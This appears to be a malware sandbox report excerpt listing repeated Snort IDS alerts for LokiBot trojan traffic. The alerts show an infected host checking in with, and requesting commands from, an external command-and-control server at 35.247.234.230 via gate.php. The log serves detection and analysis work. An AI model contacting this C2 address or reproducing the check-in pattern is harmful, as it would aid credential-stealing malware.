                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49765 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49766 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49767 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49767 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49769 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49774 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49774 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49774 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49774 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49775 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49776 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49777 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49777 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49778 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49779 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49779 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49780 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49781 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49781 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49782 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49782 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49783 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49783 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49784 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49784 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49785 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49786 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49786 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49787 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49787 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49787 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49787 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49787 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49788 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49788 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49789 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49789 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49790 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49790 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49791 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49791 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49792 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49793 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49793 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49794 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49795 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49796 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49796 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49797 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49797 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49798 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49798 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49799 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49799 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49801 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49801 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49801 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49801 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49801 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49803 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49803 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49804 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49804 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49804 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49804 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49804 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49805 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49805 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49806 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49806 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49806 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49806 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49806 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49807 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49807 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49807 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49807 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49807 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49808 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49808 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49808 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49808 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49808 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49809 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49809 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49810 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49810 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49810 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49810 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49810 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49811 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49811 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49812 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49812 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49812 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49812 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49812 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49813 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49813 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49814 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49814 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49815 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49815 -> 35.247.234.230:80
